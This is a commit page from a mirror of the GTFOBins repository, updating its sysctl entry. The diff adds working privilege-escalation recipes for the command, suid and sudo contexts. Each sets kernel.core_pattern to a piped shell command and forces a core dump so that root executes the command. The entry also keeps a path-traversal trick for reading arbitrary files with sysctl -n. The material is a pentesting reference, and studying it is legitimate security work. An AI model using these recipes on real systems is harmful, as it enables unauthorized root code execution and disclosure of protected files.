mirror/GTFOBins.github.io
1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-11-08 07:49:17 +01:00
Code Issues

Update sysctl

Browse Source 
Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
This commit is contained in:
decrazyo 2022-12-16 10:12:13 -06:00 committed by GitHub
parent 01042c2aa1
commit 21e0166608
Signed by: GitHub
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 20 additions and 6 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

26
_gtfobins/sysctl.md
View File

@ -1,16 +1,30 @@
--- ---
description: The `-p` argument can also be used in place of `-n`. In both cases though the output might get corrupted, so this might not be suitable to read binary files.
functions: functions:
command:
- description: The command is executed by root in the background when a core dump occurs.
code: |
COMMAND='/bin/sh -c id>/tmp/id'
sysctl "kernel.core_pattern=|$COMMAND"
sleep 9999 &
kill -QUIT $!
cat /tmp/id
file-read: file-read:
- code: | - description: The `-p` argument can also be used in place of `-n`. In both cases though the output might get corrupted, so this might not be suitable to read binary files.
code: |
LFILE=file_to_read LFILE=file_to_read
/usr/sbin/sysctl -n "/../../$LFILE" /usr/sbin/sysctl -n "/../../$LFILE"
suid: suid:
- code: | - code: |
LFILE=file_to_read COMMAND='/bin/sh -c id>/tmp/id'
./sysctl -n "/../../$LFILE" ./sysctl "kernel.core_pattern=|$COMMAND"
sleep 9999 &
kill -QUIT $!
cat /tmp/id
sudo: sudo:
- code: | - code: |
LFILE=file_to_read COMMAND='/bin/sh -c id>/tmp/id'
sudo sysctl -n "/../../$LFILE" sudo sysctl "kernel.core_pattern=|$COMMAND"
sleep 9999 &
kill -QUIT $!
cat /tmp/id
--- ---